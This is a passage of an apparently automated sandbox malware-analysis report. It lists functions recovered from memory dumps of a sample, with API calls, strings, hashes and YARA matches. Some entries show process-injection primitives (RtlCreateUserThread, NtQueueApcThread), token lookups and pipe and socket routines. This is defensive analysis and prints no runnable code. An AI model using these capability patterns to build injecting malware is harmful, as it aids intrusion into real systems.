                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$CreateInfoPipeSleepStartup
                • String ID: h
                • API String ID: 1809008225-2439710439
                • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                • Instruction ID: 9dac431128a5d33a1cca976349f8c7763e936ef93a065078d3ae7311692ea35b
                • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                • Instruction Fuzzy Hash: CA419A32604B889AE750CF65E84078EB7B6F788798F504219EF9C53B68DF38D646CB40
                Function 0067E1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AccountInformationLookupToken_snprintf
                • String ID: %s\%s
                • API String ID: 2107350476-4073750446
                • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                • Instruction ID: 76ff5fb1b92f255e071d72172c76c5275d98a87628965d455dad0b8e360381d6
                • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                • Instruction Fuzzy Hash: 2E213032204FC196EB24DF61E8547DA7369F788B88F448126EA8D57B18DF39C31AC740
                Function 00687E20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
                • __crtCapturePreviousContext.LIBCMT ref: 00688BA1
                • __raise_securityfailure.LIBCMT ref: 00688C43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
                • String ID: Pj
                • API String ID: 2585579334-1109624870
                • Opcode ID: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                • Instruction ID: e072f98f297580da6a0260de77f9bdce81e2c4c5eefec8c9f79deadb00f27ec1
                • Opcode Fuzzy Hash: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
                • Instruction Fuzzy Hash: 68210775704B4085EB50AB18F86135477AAF78A348F90022AEA8D577B1EF7FC865CB01
                Function 00674224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: RtlCreateUserThread$ntdll.dll
                • API String ID: 1646373207-2935400652
                • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                • Instruction ID: 412f3c1fad01ec40b37c44b9036fff2b84c8986c87c1a8c8b4a2999c95763c34
                • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                • Instruction Fuzzy Hash: BD016D32314B8192DB20CF11F894749B7A9FB88B80F998135EA9D43B14DF38C5A9C700
                Function 00673C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1646373207-1374908105
                • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                • Instruction ID: f038d303a48577b73559bf0d1ae69cbde89ae8da4f8355f731266a35975aac91
                • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                • Instruction Fuzzy Hash: E601D125300B9292DB008F22F85435AB3A5FB89FD0F988625EF5C43B28DF38C5A68300
                Function 00670C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsWow64Process$kernel32
                • API String ID: 1646373207-3789238822
                • Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                • Instruction ID: e2daee7cb0072110a92526451e8d9e6f4daa953fa947003dfc671c17928fab38
                • Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
                • Instruction Fuzzy Hash: ACE04FA172270292FE05CB55E8A47656366EB88B91F481010D94B4AB65EF3DC5A9C710
                Function 006720E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32
                • API String ID: 1646373207-3900151262
                • Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                • Instruction ID: 3879d7efb5108f01c7375b1c336d0e57c507da3620a91ff4996a8e67f594b482
                • Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
                • Instruction Fuzzy Hash: 11D0A710752607A1FE089B91FC747A41356BB5AF40F4C1020891E0B720EE3DC1EDC350
                Function 006720AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32
                • API String ID: 1646373207-736604160
                • Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                • Instruction ID: 4cd60276b6661a869d07d975088d21ef58a001d1a22f5fda6036dc8d0c00d3b0
                • Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
                • Instruction Fuzzy Hash: FBD0A710712607A1FE049BD1FC747A46356AB49F40F4C1021881E0A720EE3DC1EAC350
                Function 001BB3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction ID: 9cd805be13f1b3885f796fd01702c1fa5e39bc59ddbb0bb5b327f8e09bdc8491
                • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction Fuzzy Hash: D8519572605784CAE728CF19E9C57EC33A1F758B95F25412ADE1A4BBA1DB78C442CB80
                Function 0067BFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction ID: 6eaaa9ab1a844fe88417ef1eff5ff3034109cd015612bf2cdfcfbf95f85d5a18
                • Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
                • Instruction Fuzzy Hash: 0051BF32741640CAD714EF29E8853A833E2F769B64F24823DDA1A5B761CB3EC452CF91
                Function 001B2170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
                  • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
                  • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
                  • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
                  • Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D
                • strchr.LIBCMT ref: 001B21D6
                • _snprintf.LIBCMT ref: 001B220C
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • _snprintf.LIBCMT ref: 001B2223
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                • String ID: not create token: %d
                • API String ID: 1095232423-2272930512
                • Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                • Instruction ID: dd83be3cdc38468e2d72b40f691b647392f28cd9c647279351a05b32f2482063
                • Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
                • Instruction Fuzzy Hash: 8441C066614EC091EA159F6ED1852E8B3B0FF98B95F085512DF8D67B20EF34D1B6C340
                Function 00674A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 00674A45
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • htonl.WS2_32 ref: 00674A5B
                  • Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C
                • WaitForSingleObject.KERNEL32 ref: 00674AB6
                • free.LIBCMT ref: 00674AF2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                • String ID:
                • API String ID: 2495333179-0
                • Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                • Instruction ID: 4648d0429a6de1d140e44e85e96c72b2234793a88890e8b2bc710f0046024de4
                • Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
                • Instruction Fuzzy Hash: 2321E13670064086DB64EF62E54876A73ABFB89B98F09C518DE5D0B71CEF38C891C748
                Function 0067C230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _time64.LIBCMT ref: 0067C254
                  • Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A
                  • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                • malloc.LIBCMT ref: 0067C29C
                • strtok.LIBCMT ref: 0067C300
                • strtok.LIBCMT ref: 0067C311
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Timestrtok$FileSystem_getptd_time64malloc
                • String ID:
                • API String ID: 460628555-0
                • Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                • Instruction ID: 8085eb6fc398f76177e30c2a2fe397d02a9ce9bf3850a8c026e00e981c306913
                • Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
                • Instruction Fuzzy Hash: 042124B6600B9481DB40DF91E08866D37AAF788FE4B06822AEF2E47742CF30C542C784
                Function 001CE9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001CEA08
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _invalid_parameter_noinfo.LIBCMT ref: 001CEA13
                • strchr.LIBCMT ref: 001CEA29
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                • Instruction ID: df1a2f1e0fb05b95aa4e2a41103ac0155ce180c4fd263ffc718e7481fa4e2d62
                • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                • Instruction Fuzzy Hash: 9C1122632083E489CB2596219050B3ABAD0F3B5FD5B1D812DEAD70BA45CB2CC541CB50
                Function 001A04D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction ID: dba1a0da941d908dcf79781d7b2a93baaae24648750842988d629b3281201762
                • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction Fuzzy Hash: 19114826A04748895732EEA6748052BF690FB9D390F190035FE4403205EB74C881CF41
                Function 006610D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction ID: 24348d802dc2d1f08a0c155925a8388473e2b6d20b6d7e2de2e238697d943f74
                • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                • Instruction Fuzzy Hash: 04116632A04788599770EFA6A88156BF692FB8B3D0F1D0235EF944B705EA75CC82C740
                Function 0068F5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068F608
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0068F613
                • strchr.LIBCMT ref: 0068F629
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                • Instruction ID: 57340b939f474d349f093d2e7be4e21bbf8914060297e7e2e26b8cd3160c6e13
                • Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
                • Instruction Fuzzy Hash: E21104626082E481CB207B25905027EB7A2E785FE4B1C8339FBD64BB65FA6CC4C3C710
                Function 0067EF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                Download Yara Rule
                APIs
                • accept.WS2_32 ref: 0067EF71
                • send.WS2_32 ref: 0067EFAF
                • send.WS2_32 ref: 0067EFC3
                • closesocket.WS2_32 ref: 0067EFD4
                  • Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
                  • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$closesocketsend$accept
                • String ID:
                • API String ID: 47150829-0
                • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                • Instruction ID: cf58eb68758bca1531fd76496b1870bd21c618929383d594a1707bb9788da1b2
                • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                • Instruction Fuzzy Hash: 7E012C7531494181DB549B36E965B292362E78DFF4F149211DE2A07F85CE3AC4958B40
                Function 006753EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                • Instruction ID: 94c007245e2648addf3c19d2b24951ee6a5b039a2cf0f1d7f3946ca565b745a6
                • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                • Instruction Fuzzy Hash: 24F0A432614E5192E7108B25F84431AA3A6F784B81F648160DB8E42E78DE79C4D18705
                Function 006748D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                • Instruction ID: 731b81161f5110ee6af5e0396237b43d73dcf653e201295d023d5e07bafe4612
                • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                • Instruction Fuzzy Hash: D7F0A432614A5192E7108B25F85431BB766F785B94F648120DB8D42F74DF3DC8918B04
                Function 006776F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                Download Yara Rule
                APIs
                • InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
                • GetProcessHeap.KERNEL32 ref: 00677714
                • HeapAlloc.KERNEL32 ref: 00677724
                • InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                • String ID:
                • API String ID: 1212816094-0
                • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                • Instruction ID: f678ab742e7207cbd561e49493ae46e7ce0d9f2ae07cae3b3ba7a2ec787c370f
                • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                • Instruction Fuzzy Hash: 65F0BB2672564192DB58CB75F45075A63A6EB8CB90F585436FB0F42B14DE3DC4958B00
                Function 0067F098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • closesocket.WS2_32 ref: 0067F0A4
                • free.LIBCMT ref: 0067F0AE
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • free.LIBCMT ref: 0067F0B7
                • free.LIBCMT ref: 0067F0C0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                • String ID:
                • API String ID: 1525665891-0
                • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                • Instruction ID: d39bbc40504ba38ceb802984a6386ecaa7359909dca3ee8dfc6d7303dc756805
                • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                • Instruction Fuzzy Hash: 9ED09E2671844481DF54EFF2D8A663C1322E7D8F94F1440359E2E4B366CD64CD95C348
                Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                Download Yara Rule
                Strings
                • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                • Unknown pseudo relocation bit size %d., xrefs: 00402294
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                Download Yara Rule
                APIs
                Strings
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: __set_app_type
                • String ID: 06E$P0E
                • API String ID: 1108511539-3978550416
                • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
